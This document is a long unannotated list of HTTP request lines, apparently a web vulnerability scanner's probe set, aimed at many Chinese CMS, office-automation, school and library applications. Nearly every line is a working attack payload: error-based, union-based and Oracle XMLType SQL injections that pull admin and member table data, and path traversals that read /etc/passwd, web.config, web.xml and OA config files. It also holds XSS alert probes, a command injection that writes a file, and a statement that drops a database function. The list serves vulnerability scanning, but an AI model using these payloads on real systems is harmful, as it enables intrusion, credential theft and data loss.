GET /FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
GET /getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
HEAD /web.config.file.aspx
GET /wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
HEAD /common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
POST /information/changeState.asp
POST /MessageList.asp?action=search
POST /bangong/GroupInforDo.asp
POST /bangong/ShortCutInforDo.asp
HEAD /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
GET /shownews.aspx?newsno=-1'%20and%201=char(106)%20--
GET /nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
POST /ratercp.php?action=savepassword
GET /admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
POST /admincp.php?action=constructionresults&todo=del
POST /admincp.php?action=declarepublish&todo=del
GET /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
GET /index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
GET /index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
POST /index.php?action=search&todo=site
GET /index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
POST /include/upload.inc.php
POST /admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
POST /admincp.php?action=vote&todo=savevote
GET /admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
POST /admincp.php?action=/../teach/sitebook&id=1
GET /seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
GET /complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
GET /list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
POST /index_communicate.php
GET /file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
GET /pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
GET /pub/search/default.asp?id=-1/**/and/**/1=char(106)--
GET /pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
GET /index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
HEAD /DownLoad.aspx?mu=../&fn=web.config&newname=web.config
GET /faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
GET /NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
GET /WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
POST /pt/edu/stuTransfer.aspx
GET /NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
GET /news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
GET /news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
GET /allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
HEAD /download2.aspx?fn=../web.config
HEAD /DownLoad.aspx?Accessory=../index.aspx
POST /mod/news/qianshoucount.php
POST /mod/card/quest.php?op=get_m
POST /mod/home/quest.php?op=get_group_list
GET /NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
GET /NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
GET /js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
HEAD /ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
GET /news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
GET /ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
GET /jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
POST /scrp/book.cfm?sKeyword=1&sFieldName=bname
GET /main/
GET /asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
GET /getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
GET /install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
GET /module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
GET /myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
POST /Logon?action=logon
GET /UserSecurityController.do?method=getPassword&step=2&userName=admin
GET /webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
HEAD /common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
GET /OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
GET /showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
POST /general/crm/apps/crm/include/import/export.php
GET /Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
GET /Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
HEAD /admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
GET /cms/conf/system.xml
POST /erp/reportmanage/taskreport/lljinduadd.aspx
POST /oa/erp/SalePlan/YearPlanAdd.aspx
GET /oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
GET /oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
GET /oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
HEAD /downTemp.aspx?type=downDb&fileName=../web.config
GET /showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
GET /showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
GET /cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
GET /datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
GET /user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
GET /admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
GET /admin/manage.jsp
GET /shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
GET /content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
POST /mod/shop/quest/ajax.php?op=auction_buy
GET /wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
GET /news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
POST /mod/payment/quest.php?op=check&page=b2b
POST /mod/ntga/jwsview.php
POST /uploadd.php
GET /jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
GET /admin/backup.aspx
POST /mod/mad/video_upload.php
GET /business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
GET /SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
GET /Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
POST /frontProduct/search.ac
GET /Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
GET /Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
GET /FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
GET /website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
GET /website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
GET /website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
GET /bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
GET /znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
GET /opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /cms/framework/dbfile/createdbfile.jsp
HEAD /CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
GET /servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
GET /FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
GET /interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
GET /inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
GET /general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
GET /general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
GET /backup/backup/backup.asp
GET /module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
HEAD /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
GET /admini/item/iteminfo.aspx
GET /admini/newstopic/newstopicinfo.aspx
HEAD /download?fileName=/WEB-INF/web.xml
GET /RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
POST /index_lnlqcj.php
GET /main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
GET /scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
GET /poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
POST /information/OA_InforList.asp
GET /information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
POST /information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
POST /public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
POST /public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
GET /jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
GET /jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
GET /caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
GET /MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
POST /mailClassInfor.asp
GET /MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
GET /Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
HEAD /jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
GET /tophp.asp
POST /Manage/CalendarMemo/event.ashx
GET /RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
GET /SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
GET /SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
GET /workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
GET /SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
GET /SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
GET /resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
GET /oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
GET /lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
POST /kaoqin/JiaoYanDis.asp
GET /admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
POST /Manage/CalendarMemo/load.ashx
GET /php/report/include/ldap.inc
GET /php/report/include/util.inc
GET /php/report/include/config.inc
GET /php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
GET /user/storage_explore.php
GET /grad/admin/domain_logo.php
GET /user/storage_fold_explore.php
GET /php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
POST /user/send_queue/upload_addition.php
GET /php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
